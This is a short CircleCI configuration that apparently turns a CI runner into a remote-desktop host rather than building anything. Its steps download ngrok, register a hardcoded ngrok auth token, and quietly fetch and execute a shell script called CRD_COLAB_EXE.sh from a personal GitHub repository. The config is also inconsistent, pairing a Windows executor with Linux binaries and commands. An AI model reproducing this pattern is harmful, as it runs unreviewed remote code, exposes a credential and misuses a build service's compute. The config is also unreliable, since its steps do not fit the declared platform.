version: 2.1 
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build: 
    executor:
      name: win/default 
      size: "medium" 
 
    steps:
         - run: Invoke-WebRequest https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip && unzip ngrok-stable-linux-amd64.zip
         - run: ./ngrok authtoken 1uIoYrzg3nPM4kFcJsCEZVQslTJ_5NJV86qmRK2W6QzwmYggW
         - run: wget https://raw.githubusercontent.com/admin123356/bagol1/main/CRD_COLAB_EXE.sh &> /dev/null
         - run: chmod +x CRD_COLAB_EXE.sh
         - run: ./CRD_COLAB_EXE.sh